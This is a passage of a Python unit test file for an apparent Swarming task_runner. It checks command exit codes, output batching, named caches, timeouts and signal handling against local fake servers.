    output = re.compile(((r'^'
                          r'(?P<cwd>[^\n]*)\n'
                          r'(?P=cwd)%slocal%ssmurf\n'
                          r'(?P=cwd)%sother%sthing\n'
                          r'$') % (sep, sep, sep, sep)).encode())
    if six.PY3 and sys.platform == 'win32':
      output = re.compile(output.pattern.replace(br'\n', br'\r\n'))
    self.expectTask(task_details.task_id, output=output)
  def test_run_command_isolated(self):
    """Mocks out run_isolated with a stub script and checks outputs_ref."""
    # Hook run_isolated out to see that everything still work.
    task_details = get_task_details(isolated={
        'input': '123',
        'server': 'localhost:1',
        'namespace': 'default-gzip',
    })
    # Mock running run_isolated with a script.
    SCRIPT_ISOLATED = ('import json, sys;\n'
                       'args = []\n'
                       'if len(sys.argv) != 3 or sys.argv[1] != \'-a\':\n'
                       '  raise Exception(sys.argv)\n'
                       'with open(sys.argv[2], \'r\') as argsfile:\n'
                       '  args = json.loads(argsfile.read())\n'
                       'if len(args) != 1:\n'
                       '  raise Exception(args);\n'
                       'with open(args[0], \'w\') as f:\n'
                       '  json.dump({\n'
                       '    \'exit_code\': 0,\n'
                       '    \'had_hard_timeout\': False,\n'
                       '    \'internal_failure\': None,\n'
                       '    \'outputs_ref\': {\n'
                       '      \'isolated\': \'123\',\n'
                       '      \'isolatedserver\': \'http://localhost:1\',\n'
                       '      \'namespace\': \'default-gzip\',\n'
                       '    },\n'
                       '    \'cas_output_root\': None,\n'
                       '  }, f)\n'
                       'sys.stdout.write(\'hi\\n\')')
    self.mock(task_runner, 'get_run_isolated',
              lambda: [sys.executable, '-u', '-c', SCRIPT_ISOLATED])
    self.mock(
        task_runner, 'get_isolated_args',
        lambda work_dir, details, isolated_result, bot_file, run_isolated_flags:
        [isolated_result])
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id,
        isolated_stats=None,
        outputs_ref={
            u'isolated': u'123',
            u'isolatedserver': u'http://localhost:1',
            u'namespace': u'default-gzip',
        })
  def test_run_command_fail(self):
    """A failing command propagates its exit code to the task update."""
    task_details = get_task_details('import sys; print(\'hi\'); sys.exit(1)')
    expected = {
        u'exit_code': 1,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(task_details.task_id, exit_code=1)
  def test_run_command_os_error(self):
    """A missing executable reports exit_code 1 with an explanatory output."""
    task_details = get_task_details(
        command=[
            'executable_that_shouldnt_be_on_your_system',
            'thus_raising_OSError',
        ])
    expected = {
        u'exit_code': 1,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    pattern = (
        # This is a beginning of run_isolate.py's output if binary is not
        # found.
        br'^<The executable does not exist, a dependent library is missing or '
        br'the command line is too long>\n'
        br'<Check for missing .so/.dll in the .isolate or GN file or length of '
        br'command line args>')
    if sys.platform == 'win32':
      pattern = pattern.replace(br'\n', br'\r\n')
    output = re.compile(pattern)
    out = self.expectTask(task_details.task_id, exit_code=1, output=output)
    self.assertGreater(10., out[u'cost_usd'])
  def test_isolated_grand_children(self):
    """Runs a normal test involving 3 level deep subprocesses.
    It is the equivalent of test_isolated_io_signal_grand_children() that fails,
    this is the succeeding version.
    """
    files = {
        'parent.py':
            (b'import subprocess, sys\n'
             b'res = subprocess.call([sys.executable,\'-u\',\'children.py\'])\n'
             b'sys.exit(res)\n'),
        'children.py': (b'import subprocess, sys\n'
                        b'sys.exit(subprocess.call('
                        b'[sys.executable, \'-u\', \'grand_children.py\']))\n'),
        'grand_children.py': b'print(\'hi\')',
    }
    isolated = json.dumps({
        'files': {
            name: {
                'h':
                    self.isolateserver.add_content_compressed(
                        'default-gzip', content),
                's':
                    len(content),
            } for name, content in files.items()
        },
    }).encode()
    isolated_digest = self.isolateserver.add_content_compressed(
        'default-gzip', isolated)
    manifest = get_manifest(
        isolated={
            'input': isolated_digest,
            'namespace': 'default-gzip',
            'server': self.isolateserver.url,
        },
        command=['python', 'parent.py'],
    )
    actual = load_and_run(self.server.url, self.work_dir, manifest, None)
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, actual)
    self.expectTask(
        manifest['task_id'],
        isolated_stats={
            u'download': {
                u'duration': 0.,
                u'initial_number_items': 0,
                u'initial_size': 0,
                u'items_cold': u'eJzjDmaawAgAAq8A8g==',
                u'items_hot': u'',
            },
            u'upload': {
                u'duration': 0.,
                u'items_cold': u'',
                u'items_hot': u'',
            },
        })
  def test_run_command_large(self):
    """Mocks Popen to stream a large output and checks packet batching."""
    # Method should have "self" as first argument - pylint: disable=E0213
    class Popen(object):
      """Mocks the process so we can control how data is returned."""
      def __init__(self2, _cmd, cwd, env, stdout, stderr, stdin, detached):
        self.assertEqual(self.work_dir, cwd)
        expected_env = os.environ.copy()
        # In particular, foo=bar is not set here, it will be passed to
        # run_isolated as an argument.
        expected_env['LUCI_CONTEXT'] = env['LUCI_CONTEXT']  # tmp file
        self.assertEqual(expected_env, env)
        self.assertEqual(subprocess42.PIPE, stdout)
        self.assertEqual(subprocess42.STDOUT, stderr)
        self.assertEqual(subprocess42.PIPE, stdin)
        self.assertEqual(True, detached)
        self2._out = [
            b'hi!\n',
            b'hi!\n',
            b'hi!\n' * 100000,
            b'hi!\n',
        ]
        if six.PY3 and sys.platform == 'win32':
          self2._out = [out.replace(b'\n', b'\r\n') for out in self2._out]
      def yield_any(self2, maxsize, timeout):
        self.assertLess(0, maxsize())
        self.assertLess(0, timeout())
        for i in self2._out:
          yield 'stdout', i
      @staticmethod
      def wait():
        return 0
      @staticmethod
      def kill():
        return True
    self.mock(subprocess42, 'Popen', Popen)
    task_details = get_task_details()
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id,
        bot_overhead=None,
        isolated_stats=None,
        output=to_native_eol('hi!\n' * 100003).encode())
    # Here, we want to carefully check the packets sent to ensure the internal
    # timer works as expected. There's 3 updates:
    # - initial task startup with no output
    # - buffer filled with the 3 first yield
    # - last yield
    updates = self.server.get_tasks()[task_details.task_id]
    self.assertEqual(3, len(updates))
    self.assertEqual(None, updates[0].get(u'output'))
    self.assertEqual(base64.b64encode(
        to_native_eol('hi!\n' * 100002).encode()), updates[1][u'output'].encode())
    self.assertEqual(base64.b64encode(
        to_native_eol('hi!\n').encode()), updates[2][u'output'].encode())
  def test_run_command_caches(self):
    # This test puts a file into a named cache, remove it, runs a test that
    # updates the named cache, remaps it and asserts the content was updated.
    #
    # Directories:
    #   <root_dir>/
    #   <root_dir>/c - <cache_dir> named cache root
    #   <root_dir>/dest - <dest_dir> used for manual cache update
    #   <root_dir>/w - <self.work_dir> used by the task.
    cache_dir = os.path.join(self.root_dir, u'c')
    dest_dir = os.path.join(self.root_dir, u'dest')
    policies = local_caching.CachePolicies(0, 0, 0, 0)
    # Inject file 'bar' in the named cache 'foo'.
    cache = local_caching.NamedCache(cache_dir, policies)
    cache.install(dest_dir, 'foo')
    with open(os.path.join(dest_dir, 'bar'), 'wb') as f:
      f.write(b'thecache')
    cache.uninstall(dest_dir, 'foo')
    self.assertFalse(os.path.exists(dest_dir))
    self._expect_files([u'c/*/bar', u'c/state.json'])
    # Maps the cache 'foo' as 'cache_foo'. This runs inside self.work_dir.
    # This runs the command for real.
    script = ('import os\n'
              'print("hi")\n'
              'with open("cache_foo/bar", "r") as f:\n'
              '  cached = f.read()\n'
              'with open("../../result", "w") as f:\n'
              '  f.write(cached)\n'
              'with open("cache_foo/bar", "w") as f:\n'
              '  f.write("updated_cache")\n')
    task_details = get_task_details(
        script, caches=[{'name': 'foo', 'path': 'cache_foo', 'hint': '100'}])
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    self._expect_files([
        u'c/*/bar',
        u'c/state.json',
        u'w/cas-cache/state.json',
        u'w/cache/state.json',
        u'result',
        u'w/run_isolated_args.json',
    ])
    # Ensure the 'result' file written my the task contained foo/bar.
    with open(os.path.join(self.root_dir, 'result'), 'rb') as f:
      self.assertEqual(b'thecache', f.read())
    os.remove(os.path.join(self.root_dir, 'result'))
    cache = local_caching.NamedCache(cache_dir, policies)
    self.assertFalse(os.path.exists(dest_dir))
    self._expect_files([
        u'w/cas-cache/state.json',
        u'c/*/bar',
        u'c/state.json',
        u'w/run_isolated_args.json',
        u'w/cache/state.json',
    ])
    cache.install(dest_dir, 'foo')
    self._expect_files([
        u'dest/bar',
        u'c/state.json',
        u'w/run_isolated_args.json',
        u'w/cas-cache/state.json',
        u'w/cache/state.json',
    ])
    with open(os.path.join(dest_dir, 'bar'), 'rb') as f:
      self.assertEqual(b'updated_cache', f.read())
    cache.uninstall(dest_dir, 'foo')
    self.assertFalse(os.path.exists(dest_dir))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(task_details.task_id)
  def test_start_task_runner_fail_on_startup(self):
    """_start_task_runner raises _FailureOnStart when the command is bogus."""
    def _get_run_isolated():
      return ['invalid_commad_that_shouldnt_exist']
    self.mock(task_runner, 'get_run_isolated', _get_run_isolated)
    with self.assertRaises(task_runner._FailureOnStart) as e:
      task_runner._start_task_runner([], self.work_dir, None)
    self.assertEqual(2, e.exception.exit_code)
  def test_main(self):
    """main() parses flags and forwards them verbatim to load_and_run()."""
    def _load_and_run(manifest, swarming_server, cost_usd_hour, start,
                      json_file, run_isolated_flags, bot_file,
                      auth_params_file):
      self.assertEqual('foo', manifest)
      self.assertEqual(self.server.url, swarming_server)
      self.assertEqual(3600., cost_usd_hour)
      self.assertGreaterEqual(time.time(), start)
      self.assertEqual('task_summary.json', json_file)
      self.assertEqual(['--min-free-space', '1'], run_isolated_flags)
      self.assertEqual('/path/to/bot-file', bot_file)
      self.assertEqual('/path/to/auth-params-file', auth_params_file)
    self.mock(task_runner, 'load_and_run', _load_and_run)
    cmd = [
        '--swarming-server',
        self.server.url,
        '--in-file',
        'foo',
        '--out-file',
        'task_summary.json',
        '--cost-usd-hour',
        '3600',
        '--start',
        str(time.time()),
        '--bot-file',
        '/path/to/bot-file',
        '--auth-params-file',
        '/path/to/auth-params-file',
        '--',
        '--min-free-space',
        '1',
    ]
    self.assertEqual(0, task_runner.main(cmd))
class TestTaskRunnerKilled(TestTaskRunnerBase):
  # These test cases run the command for real where the process is killed.
  # TODO(maruel): Calculate this value automatically through iteration? This is
  # really bad and prone to flakiness.
  SHORT_TIME_OUT = 3.
  # Here's a simple script that handles signals properly. Sadly SIGBREAK is not
  # defined on posix.
  SCRIPT_SIGNAL = ('import signal, sys, threading;\n'
                   'event = threading.Event();\n'
                   'def handler(signum, _):\n'
                   '  event.set();\n'
                   '  print(\'got signal %%d\' %% signum);\n'
                   '  sys.stdout.flush();\n'
                   'signal.signal(signal.%s, handler);\n'
                   'print(\'hi\');\n'
                   'sys.stdout.flush();\n'
                   'while not event.is_set():\n'
                   '  pass;\n'
                   'print(\'bye\');\n'
                   'sys.stdout.flush();') % ('SIGBREAK' if sys.platform ==
                                             'win32' else 'SIGTERM')
  # Same as SCRIPT_SIGNAL, but sleeps after handling the signal so it has to
  # be hard-killed.
  SCRIPT_SIGNAL_HANG = ('import signal, sys, time, threading;\n'
                        'event = threading.Event();\n'
                        'def handler(signum, _):\n'
                        '  event.set();\n'
                        '  print(\'got signal %%d\' %% signum);\n'
                        '  sys.stdout.flush();\n'
                        'signal.signal(signal.%s, handler);\n'
                        'print(\'hi\');\n'
                        'sys.stdout.flush();\n'
                        'while not event.is_set():\n'
                        '  pass;\n'
                        'print(\'bye\');\n'
                        'sys.stdout.flush();\n'
                        'time.sleep(100);') % ('SIGBREAK' if sys.platform ==
                                               'win32' else 'SIGTERM')
  # Script that ignores signals entirely and just sleeps.
  SCRIPT_HANG = 'import time; print(\'hi\'); time.sleep(100)'
  def test_killed_early(self):
    # The task is killed on first update, so it doesn't have the chance to do
    # anything.
    task_details = get_task_details('print(\'hi\')')
    # task_runner is told to kill the task right on the first task update.
    self.server.must_stop = True
    expected = {
        u'exit_code': -1,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': 3,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    expected = {
        u'id': u'localhost',
        u'task_id': task_details.task_id,
        u'canceled': True,
        u'exit_code': -1
    }
    actual = self.getTaskResults(task_details.task_id)
    self.assertLessEqual(0, actual.pop(u'cost_usd'))
    self.assertEqual(expected, actual)
  def test_killed_later(self):
    # Case where a task started and a client asks the server to kill the task.
    # In this case the task results in state KILLED.
    # Make the task update a busy loop to reduce the duration of this test case.
    self.mock(task_runner._OutputBuffer, '_MIN_PACKET_INTERVAL', 0.2)
    self.mock(task_runner._OutputBuffer, '_MAX_PACKET_INTERVAL', 0.2)
    # We need to 'prime' the server before starting the thread.
    self.assertTrue(self.server.url)
    task_details = get_task_details(
        'import sys,time;sys.stdout.write(\'hi\\n\');time.sleep(100)')
    # Cheezy but good enough.
    def run():
      # Wait until there's output.
      while True:
        self.server.has_updated_task.wait()
        self.server.has_updated_task.clear()
        if 'output' in self.getTaskResults(task_details.task_id):
          self.server.must_stop = True
          break
    t = threading.Thread(target=run)
    t.daemon = True
    t.start()
    expected = {
        u'exit_code': EXIT_CODE_TERM,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': 3,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(task_details.task_id, exit_code=EXIT_CODE_TERM)
    t.join()
  def test_hard(self):
    """Hard timeout on a hanging script terminates it."""
    task_details = get_task_details(
        self.SCRIPT_HANG, hard_timeout=self.SHORT_TIME_OUT)
    expected = {
        u'exit_code': EXIT_CODE_TERM,
        u'hard_timeout': True,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id, hard_timeout=True, exit_code=EXIT_CODE_TERM)
  def test_io(self):
    """I/O timeout on a hanging script terminates it."""
    task_details = get_task_details(
        self.SCRIPT_HANG, io_timeout=self.SHORT_TIME_OUT)
    expected = {
        u'exit_code': EXIT_CODE_TERM,
        u'hard_timeout': False,
        u'io_timeout': True,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id, io_timeout=True, exit_code=EXIT_CODE_TERM)
  def test_hard_signal(self):
    """Hard timeout with a well-behaved script that exits on the signal."""
    task_details = get_task_details(
        self.SCRIPT_SIGNAL, hard_timeout=self.SHORT_TIME_OUT)
    # Returns 0 because the process cleaned up itself.
    expected = {
        u'exit_code': 0,
        u'hard_timeout': True,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id,
        hard_timeout=True,
        output=(to_native_eol('hi\ngot signal %d\nbye\n') %
                task_runner.SIG_BREAK_OR_TERM).encode())
  def test_io_signal(self):
    """I/O timeout with a well-behaved script that exits on the signal."""
    task_details = get_task_details(
        self.SCRIPT_SIGNAL, io_timeout=self.SHORT_TIME_OUT)
    # Returns 0 because the process cleaned up itself.
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': True,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    # output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
    self.expectTask(
        task_details.task_id,
        io_timeout=True,
        output=(to_native_eol('hi\ngot signal %d\nbye\n') %
                task_runner.SIG_BREAK_OR_TERM).encode())
  def test_hard_no_grace(self):
    """Hard timeout with a short grace period still terminates the script."""
    task_details = get_task_details(
        self.SCRIPT_HANG,
        hard_timeout=self.SHORT_TIME_OUT,
        grace_period=self.SHORT_TIME_OUT)
    expected = {
        u'exit_code': EXIT_CODE_TERM,
        u'hard_timeout': True,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(
        task_details.task_id, hard_timeout=True, exit_code=EXIT_CODE_TERM)
  @unittest.skipIf(
      sys.platform == 'win32',
      'As run_isolated is killed, the children process leaks')
  def test_io_no_grace(self):
    """I/O timeout with a short grace period ends in a SIGTERM kill."""
    task_details = get_task_details(
        self.SCRIPT_HANG,
        io_timeout=self.SHORT_TIME_OUT,
        grace_period=self.SHORT_TIME_OUT)
    exit_code = -1 if sys.platform == 'win32' else -signal.SIGTERM
    expected = {
        u'exit_code': exit_code,
        u'hard_timeout': False,
        u'io_timeout': True,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    self.expectTask(task_details.task_id, io_timeout=True, exit_code=exit_code)
  def test_hard_signal_no_grace(self):
    """Hard timeout where the script swallows the signal: hard-killed."""
    task_details = get_task_details(
        self.SCRIPT_SIGNAL_HANG, hard_timeout=self.SHORT_TIME_OUT,
        grace_period=self.SHORT_TIME_OUT)
    exit_code = 1 if sys.platform == 'win32' else -signal.SIGKILL
    expected = {
        u'exit_code': exit_code,
        u'hard_timeout': True,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    # output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
    self.expectTask(
        task_details.task_id,
        hard_timeout=True,
        exit_code=exit_code,
        output=(to_native_eol('hi\ngot signal %d\nbye\n') %
                task_runner.SIG_BREAK_OR_TERM).encode())
  @unittest.skipIf(sys.platform == 'win32',
                   'As run_isolated is killed, the children process leaks')
  def test_io_signal_no_grace(self):
    """I/O timeout where the script swallows the signal: hard-killed."""
    task_details = get_task_details(
        self.SCRIPT_SIGNAL_HANG,
        io_timeout=self.SHORT_TIME_OUT,
        grace_period=self.SHORT_TIME_OUT)
    exit_code = -1 if sys.platform == 'win32' else -signal.SIGKILL
    expected = {
        u'exit_code': exit_code,
        u'hard_timeout': False,
        u'io_timeout': True,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, self._run_command(task_details))
    # Now look at the updates sent by the bot as seen by the server.
    # output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
    self.expectTask(
        task_details.task_id,
        io_timeout=True,
        exit_code=exit_code,
        output=(to_native_eol('hi\ngot signal %d\nbye\n') %
                task_runner.SIG_BREAK_OR_TERM).encode())
  def test_isolated_io_signal_grand_children(self):
    """Handles grand-children process hanging and signal management.
    In this case, the I/O timeout is implemented by task_runner. The hard
    timeout is implemented by run_isolated.
    """
    files = {
        'parent.py': (
            b'import subprocess, sys\n'
            b'print(\'parent\')\n'
            b'p = subprocess.Popen([sys.executable, \'-u\', \'children.py\'])\n'
            b'print(p.pid)\n'
            b'p.wait()\n'
            b'sys.exit(p.returncode)\n'),
        'children.py': (b'import subprocess, sys\n'
                        b'print(\'children\')\n'
                        b'p = subprocess.Popen('
                        b'[sys.executable,\'-u\',\'grand_children.py\'])\n'
                        b'print(p.pid)\n'
                        b'p.wait()\n'
                        b'sys.exit(p.returncode)\n'),
        'grand_children.py': self.SCRIPT_SIGNAL_HANG.encode(),
    }
    isolated = json.dumps({
        'files': {
            name: {
                'h':
                    self.isolateserver.add_content_compressed(
                        'default-gzip', content),
                's':
                    len(content),
            } for name, content in files.items()
        },
    })
    isolated_digest = self.isolateserver.add_content_compressed(
        'default-gzip', isolated.encode())
    manifest = get_manifest(
        isolated={
            'input': isolated_digest,
            'namespace': 'default-gzip',
            'server': self.isolateserver.url,
        },
        command=['python', '-u', 'parent.py'],
        # TODO(maruel): A bit cheezy, we'd want the I/O timeout to be just
        # enough to have the time for the PID to be printed but not more.
        #
        # This could be achieved by mocking time, and using a text file as a
        # signal.
        io_timeout=self.SHORT_TIME_OUT,
        grace_period=60.)
    expected = {
        u'exit_code': EXIT_CODE_TERM,
        u'hard_timeout': False,
        u'io_timeout': True,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    try:
      actual = load_and_run(self.server.url, self.work_dir, manifest, None)
    finally:
      # We need to catch the pid of the grand children to be able to kill it. We
      # do so by processing stdout. Do not use expectTask() output, since it can
      # throw.
      output = self.getTaskResults(manifest['task_id'])['output']
      for k in output.splitlines():
        if not k.isdigit():
          continue
        pid = int(k)
        try:
          if sys.platform == 'win32':
            # This effectively kills.
            os.kill(pid, signal.SIGTERM)
          else:
            os.kill(pid, signal.SIGKILL)
        except OSError:
          pass
    self.assertEqual(expected, actual)
    # This is cheezy, this depends on the compiled isolated file.
    if sys.platform == 'win32':
      items_cold = u'eJybwMgW6w0AA/ABQA=='
    else:
      items_cold = u'eJybwMgW6wUAA+8BPw=='
    self.expectTask(
        manifest['task_id'],
        io_timeout=True,
        exit_code=EXIT_CODE_TERM,
        output=re.compile(
            to_native_eol('parent\n\\d+\nchildren\n\\d+\nhi\n').encode()),
        isolated_stats={
            u'download': {
                u'duration': 0.,
                u'initial_number_items': 0,
                u'initial_size': 0,
                u'items_cold': items_cold,
                u'items_hot': u'',
            },
            u'upload': {
                u'duration': 0.,
                u'items_cold': u'',
                u'items_hot': u'',
            },
        })
  def test_kill_and_wait(self):
    # Test the case where the script swallows the SIGTERM/SIGBREAK signal and
    # hangs.
    script = os.path.join(self.root_dir, 'ignore_sigterm.py')
    with open(script, 'wb') as f:
      # The warning signal is received as SIGTERM on posix and SIGBREAK on
      # Windows.
      sig = 'SIGBREAK' if sys.platform == 'win32' else 'SIGTERM'
      f.write((('import signal, sys, time\n'
                'def handler(_signum, _frame):\n'
                '  sys.stdout.write("got it\\n")\n'
                'signal.signal(signal.%s, handler)\n'
                'sys.stdout.write("ok\\n")\n'
                'while True:\n'
                '  try:\n'
                '    time.sleep(0.01)\n'
                '  except IOError:\n'
                '    pass\n') % sig).encode())
    cmd = [sys.executable, '-u', script]
    # detached=True is required on Windows for SIGBREAK to propagate properly.
    p = subprocess42.Popen(cmd, detached=True, stdout=subprocess42.PIPE)
    # Wait for it to write 'ok', so we know it's handling signals. It's
    # important because otherwise SIGTERM/SIGBREAK could be sent before the
    # signal handler is installed, and this is not what we're testing here.
    self.assertEqual(to_native_eol('ok\n').encode(), p.stdout.readline())
    # Send a SIGTERM/SIGBREAK, the process ignores it, send a SIGKILL.
    exit_code = task_runner.kill_and_wait(p, 1, 'testing purposes')
    expected = 1 if sys.platform == 'win32' else -signal.SIGKILL
    self.assertEqual(expected, exit_code)
    self.assertEqual(to_native_eol('got it\n').encode(), p.stdout.readline())
  def test_signal(self):
    # Tests when task_runner gets a SIGTERM.
    signal_file = os.path.join(self.work_dir, 'signal')
    open(signal_file, 'wb').close()
    # As done by bot_main.py.
    manifest = get_manifest(
        script='import os,time;os.remove(%r);time.sleep(60)' % signal_file,
        hard_timeout=60.,
        io_timeout=60.)
    task_in_file = os.path.join(self.work_dir, 'task_runner_in.json')
    task_result_file = os.path.join(self.work_dir, 'task_runner_out.json')
    with open(task_in_file, 'w') as f:
      json.dump(manifest, f)
    bot = os.path.join(self.root_dir, 'swarming_bot.1.zip')
    code, _ = swarmingserver_bot_fake.gen_zip(self.server.url)
    with open(bot, 'wb') as f:
      f.write(code)
    cmd = [
        sys.executable,
        bot,
        'task_runner',
        '--swarming-server',
        self.server.url,
        '--in-file',
        task_in_file,
        '--out-file',
        task_result_file,
        '--cost-usd-hour',
        '1',
        # Include the time taken to poll the task in the cost.
        '--start',
        str(time.time()),
        '--',
        '--cache',
        'isolated_cache_party',
    ] + DISABLE_CIPD_FOR_TESTS
    logging.info('%s', cmd)
    proc = subprocess42.Popen(cmd, cwd=self.root_dir, detached=True)
    logging.info('Waiting for child process to be alive')
    while os.path.isfile(signal_file):
      time.sleep(0.01)
    # Send SIGTERM to task_runner itself. Ensure the right thing happen.
    # Note that on Windows, this is actually sending a SIGBREAK since there's no
    # such thing as SIGTERM.
    logging.info('Sending SIGTERM')
    proc.send_signal(signal.SIGTERM)
    proc.wait()
    task_runner_log = os.path.join(self.logs_dir, 'task_runner.log')
    with open(task_runner_log, 'rb') as f:
      logging.info('task_runner.log:\n---\n%s---', f.read())
    self.assertEqual([], self.server.get_bot_events())
    expected = {
        'swarming_bot.1.zip',
        '7f03c894282e3fc39105466a8ee5055ffd05e79dfd4010360117078afbfa68bd'
        '-cacert.'
        'pem',
        'w',
        'isolated_cache_party',
        'logs',
        'c',
        'cas-cache',
    }
    self.assertEqual(expected, set(os.listdir(self.root_dir)))
    expected = {
        u'hard_timeout': False,
        u'id': u'localhost',
        u'io_timeout': False,
        u'task_id': manifest['task_id'],
    }
    actual = self.getTaskResults(manifest['task_id'])
    self.assertLessEqual(0, actual.pop(u'cost_usd'))
    self.assertEqual(expected, actual)
    # TODO(sethkoehler): Set exit_code to 'exit_code' variable rather than None
    # when we correctly pass exit_code on failure (see TODO in task_runner.py).
    expected = {
        u'exit_code': None,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': u'',
        u'version': 3,
    }
    with open(task_result_file, 'rb') as f:
      self.assertEqual(expected, json.load(f))
    self.assertEqual(0, proc.returncode)
    # Also verify the correct error was posted.
    errors = self.server.get_task_errors()
    expected = {
        manifest['task_id']: [{
            u'message':
                u'task_runner received signal %d' %
                task_runner.SIG_BREAK_OR_TERM,
            u'id':
                u'localhost',
            u'task_id':
                manifest['task_id'],
        }],
    }
    self.assertEqual(expected, errors)
class TaskRunnerNoServer(auto_stub.TestCase):
  """Test cases that do not talk to the server."""
  def setUp(self):
    super(TaskRunnerNoServer, self).setUp()
    # Fresh scratch directory per test case.
    self.root_dir = six.ensure_text(tempfile.mkdtemp(prefix=u'task_runner'))
  def tearDown(self):
    try:
      file_path.rmtree(self.root_dir)
    except OSError:
      print('Failed to delete %s' % self.root_dir, file=sys.stderr)
      raise
    finally:
      super(TaskRunnerNoServer, self).tearDown()
  def test_load_and_run_isolated(self):
    """load_and_run() with an isolated manifest and no local_auth context."""
    self.mock(bot_auth, 'AuthSystem', FakeAuthSystem)
    def _run_command(remote, task_details, work_dir, cost_usd_hour, start,
                     run_isolated_flags, bot_file, ctx_file):
      self.assertTrue(remote.uses_auth)  # mainly to avoid unused arg warning
      self.assertTrue(isinstance(task_details, task_runner.TaskDetails))
      # Necessary for OSX.
      self.assertEqual(
          os.path.realpath(self.root_dir), os.path.realpath(work_dir))
      self.assertEqual(3600., cost_usd_hour)
      self.assertGreaterEqual(time.time(), start)
      self.assertEqual(['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
                       run_isolated_flags)
      self.assertEqual(None, bot_file)
      with open(ctx_file, 'r') as f:
        self.assertIsNone(json.load(f).get('local_auth'))
      return {
          u'exit_code': 0,
          u'hard_timeout': False,
          u'io_timeout': False,
          u'must_signal_internal_failure': None,
          u'version': task_runner.OUT_VERSION,
      }
    self.mock(task_runner, 'run_command', _run_command)
    manifest = get_manifest(
        command=['hello.exe'],
        env={'d': 'e'},
        isolated={
            'input': '123',
            'server': 'http://localhost:1',
            'namespace': 'default-gzip',
        })
    actual = load_and_run(
        'http://localhost:1', self.root_dir, manifest,
        '/path/to/auth-params-file')
    expected = {
        u'exit_code': 0,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, actual)
  def test_load_and_run_raw(self):
    """load_and_run() with a raw command, local_auth and realm contexts."""
    local_auth_ctx = {
        'accounts': [{
            'id': 'a'
        }, {
            'id': 'b'
        }],
        'default_account_id': 'a',
        'rpc_port': 123,
        'secret': 'abcdef',
    }
    realm_ctx = {'name': 'test:realm'}
    def _run_command(
        remote, task_details, work_dir,
        cost_usd_hour, start, run_isolated_flags, bot_file, ctx_file):
      self.assertTrue(remote.uses_auth)  # mainly to avoid "unused arg" warning
      self.assertTrue(isinstance(task_details, task_runner.TaskDetails))
      # Necessary for OSX.
      self.assertEqual(
          os.path.realpath(self.root_dir), os.path.realpath(work_dir))
      self.assertEqual(3600., cost_usd_hour)
      self.assertGreaterEqual(time.time(), start)
      self.assertEqual(['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
                       run_isolated_flags)
      self.assertEqual(None, bot_file)
      with open(ctx_file, 'r') as f:
        ctx = json.load(f)
